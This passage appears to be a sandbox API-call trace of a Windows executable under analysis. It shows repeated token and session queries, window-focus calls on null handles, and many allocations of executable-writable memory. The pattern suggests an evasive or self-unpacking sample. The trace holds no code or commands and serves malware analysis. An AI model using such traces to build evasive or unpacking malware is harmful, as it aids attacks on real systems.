ReturnLength=0x20ba434) returned 0 [0072.902] GetLastError () returned 0x7a [0072.902] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.902] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.903] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.903] TextOutW (hdc=0x0, x=4584, y=11224, lpString="", c=0) returned 1 [0072.903] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.903] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.903] GetTickCount () returned 0x1f4fa [0072.903] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.903] SetForegroundWindow (hWnd=0x0) returned 0 [0072.904] BringWindowToTop (hWnd=0x0) returned 0 [0072.904] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x960) returned 1 [0072.904] GetTokenInformation (in: TokenHandle=0x960, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.904] GetLastError () returned 0x7a [0072.904] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.904] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.904] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.904] TextOutW (hdc=0x0, x=4594, y=11249, lpString="", c=0) returned 1 [0072.904] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.904] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.904] GetTickCount () returned 0x1f4fa [0072.905] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.905] SetForegroundWindow (hWnd=0x0) returned 0 [0072.905] BringWindowToTop (hWnd=0x0) returned 0 [0072.906] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x964) returned 1 [0072.906] GetTokenInformation (in: TokenHandle=0x964, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.906] GetLastError () returned 0x7a [0072.906] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.906] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.906] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.906] TextOutW (hdc=0x0, x=4604, y=11274, lpString="", c=0) returned 1 [0072.906] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.906] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.906] GetTickCount () returned 0x1f4fa [0072.907] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.907] SetForegroundWindow (hWnd=0x0) returned 0 [0072.907] BringWindowToTop (hWnd=0x0) returned 0 [0072.907] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x968) returned 1 [0072.907] GetTokenInformation (in: TokenHandle=0x968, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.907] GetLastError () returned 0x7a [0072.907] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.907] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.907] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.907] TextOutW (hdc=0x0, x=4614, y=11299, lpString="", c=0) returned 1 [0072.907] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.908] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.908] GetTickCount () returned 0x1f4fa [0072.908] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.909] SetForegroundWindow (hWnd=0x0) returned 0 [0072.909] BringWindowToTop (hWnd=0x0) returned 0 [0072.909] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x96c) returned 1 [0072.909] GetTokenInformation (in: TokenHandle=0x96c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.909] GetLastError () returned 0x7a [0072.909] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.909] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.909] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.910] TextOutW (hdc=0x0, x=4624, y=11324, lpString="", c=0) returned 1 [0072.910] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.910] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.910] GetTickCount () returned 0x1f509 [0072.910] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.910] SetForegroundWindow (hWnd=0x0) returned 0 [0072.910] BringWindowToTop (hWnd=0x0) returned 0 [0072.910] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x970) returned 1 [0072.910] GetTokenInformation (in: TokenHandle=0x970, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.910] GetLastError () returned 0x7a [0072.910] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.910] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.911] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.911] TextOutW (hdc=0x0, x=4634, y=11349, lpString="", c=0) returned 1 [0072.911] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.911] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.911] GetTickCount () returned 0x1f509 [0072.912] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.912] SetForegroundWindow (hWnd=0x0) returned 0 [0072.912] BringWindowToTop (hWnd=0x0) returned 0 [0072.912] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x974) returned 1 [0072.912] GetTokenInformation (in: TokenHandle=0x974, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.912] GetLastError () returned 0x7a [0072.912] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.912] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.913] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.913] TextOutW (hdc=0x0, x=4644, y=11374, lpString="", c=0) returned 1 [0072.913] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.913] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.913] GetTickCount () returned 0x1f509 [0072.913] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.913] SetForegroundWindow (hWnd=0x0) returned 0 [0072.914] BringWindowToTop (hWnd=0x0) returned 0 [0072.914] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x978) returned 1 [0072.914] GetTokenInformation (in: TokenHandle=0x978, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.914] GetLastError () returned 0x7a [0072.914] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.914] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.914] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.914] TextOutW (hdc=0x0, x=4654, y=11399, lpString="", c=0) returned 1 [0072.914] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.914] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.914] GetTickCount () returned 0x1f509 [0072.915] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.915] SetForegroundWindow (hWnd=0x0) returned 0 [0072.915] BringWindowToTop (hWnd=0x0) returned 0 [0072.915] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x97c) returned 1 [0072.915] GetTokenInformation (in: TokenHandle=0x97c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.915] GetLastError () returned 0x7a [0072.915] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.915] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.916] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.916] TextOutW (hdc=0x0, x=4664, y=11424, lpString="", c=0) returned 1 [0072.916] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.916] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.916] GetTickCount () returned 0x1f509 [0072.917] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.917] SetForegroundWindow (hWnd=0x0) returned 0 [0072.917] BringWindowToTop (hWnd=0x0) returned 0 [0072.917] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x980) returned 1 [0072.917] GetTokenInformation (in: TokenHandle=0x980, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.917] GetLastError () returned 0x7a [0072.917] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.917] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.918] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.918] TextOutW (hdc=0x0, x=4674, y=11449, lpString="", c=0) returned 1 [0072.918] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.918] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.918] GetTickCount () returned 0x1f509 [0072.918] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.918] SetForegroundWindow (hWnd=0x0) returned 0 [0072.918] BringWindowToTop (hWnd=0x0) returned 0 [0072.918] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x984) returned 1 [0072.918] GetTokenInformation (in: TokenHandle=0x984, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.918] GetLastError () returned 0x7a [0072.918] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.918] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.919] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.919] TextOutW (hdc=0x0, x=4684, y=11474, lpString="", c=0) returned 1 [0072.919] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.919] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.919] GetTickCount () returned 0x1f509 [0072.920] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.920] SetForegroundWindow (hWnd=0x0) returned 0 [0072.920] BringWindowToTop (hWnd=0x0) returned 0 [0072.920] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x988) returned 1 [0072.920] GetTokenInformation (in: TokenHandle=0x988, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.920] GetLastError () returned 0x7a [0072.920] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.920] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.921] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.921] TextOutW (hdc=0x0, x=4694, y=11499, lpString="", c=0) returned 1 [0072.921] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.921] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.921] GetTickCount () returned 0x1f509 [0072.922] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.922] SetForegroundWindow (hWnd=0x0) returned 0 [0072.922] BringWindowToTop (hWnd=0x0) returned 0 [0072.922] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x98c) returned 1 [0072.922] GetTokenInformation (in: TokenHandle=0x98c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.923] GetLastError () returned 0x7a [0072.923] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.923] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.923] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.923] TextOutW (hdc=0x0, x=4704, y=11524, lpString="", c=0) returned 1 [0072.923] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.923] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.923] GetTickCount () returned 0x1f509 [0117.791] ReadFile (in: hFile=0xffffffff, lpBuffer=0x20d7c88, nNumberOfBytesToRead=0xfffffff2, lpNumberOfBytesRead=0x20bb8dc, lpOverlapped=0x0 | out: lpBuffer=0x20d7c88, lpNumberOfBytesRead=0x20bb8dc*=0x0, lpOverlapped=0x0) returned 0 [0117.791] CloseHandle (hObject=0xffffffff) returned 1 [0117.791] CloseHandle (hObject=0xffffffff) returned 1 [0117.791] ReadFile (in: hFile=0xffffffff, lpBuffer=0x0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x20bb8dc, lpOverlapped=0x0 | out: lpBuffer=0x0, lpNumberOfBytesRead=0x20bb8dc*=0x0, lpOverlapped=0x0) returned 0 [0117.791] CloseHandle (hObject=0xffffffff) returned 1 [0117.791] PathFileExistsA (pszPath="") returned 0 [0117.792] GetFileVersionInfoW (in: lptstrFilename="", dwHandle=0xe313, dwLen=0x0, lpData=0x20bf494 | out: lpData=0x20bf494) returned 0 [0117.792] GetModuleHandleA (lpModuleName="ntdll") returned 0x77ca0000 [0117.792] GetModuleHandleA (lpModuleName="advapi32") returned 0x76a10000 [0117.804] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0117.825] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.827] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0117.844] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.847] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0117.863] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.865] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0117.881] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.936] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0117.952] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.955] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0117.971] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.973] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0117.990] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0117.992] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.088] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.090] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.107] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.109] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.126] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.128] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.145] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.147] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.164] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.167] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.185] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.187] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.204] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.207] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.224] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.229] GetModuleHandleA (lpModuleName="ntdll") returned 0x77ca0000 [0118.230] GetModuleHandleA (lpModuleName="advapi32") returned 0x76a10000 [0118.240] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0118.246] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.263] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.266] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.282] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.285] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.303] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.305] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.321] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.324] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.340] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.343] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.361] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.364] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.383] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.386] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.403] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.405] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.421] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.423] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.439] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.441] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.457] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.460] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.475] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.478] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.495] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.498] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.514] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.517] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.533] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.535] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.550] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.553] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.577] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.580] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.598] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.601] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.617] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.620] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.636] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.638] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.655] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.657] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.673] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.675] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.691] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.693] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.709] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.713] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.729] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.732] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.748] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.751] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.766] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.769] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.786] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0118.788] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x40) returned 0x2710000 [0118.805] VirtualFree (lpAddress=0x2710000, dwSize=0x0, 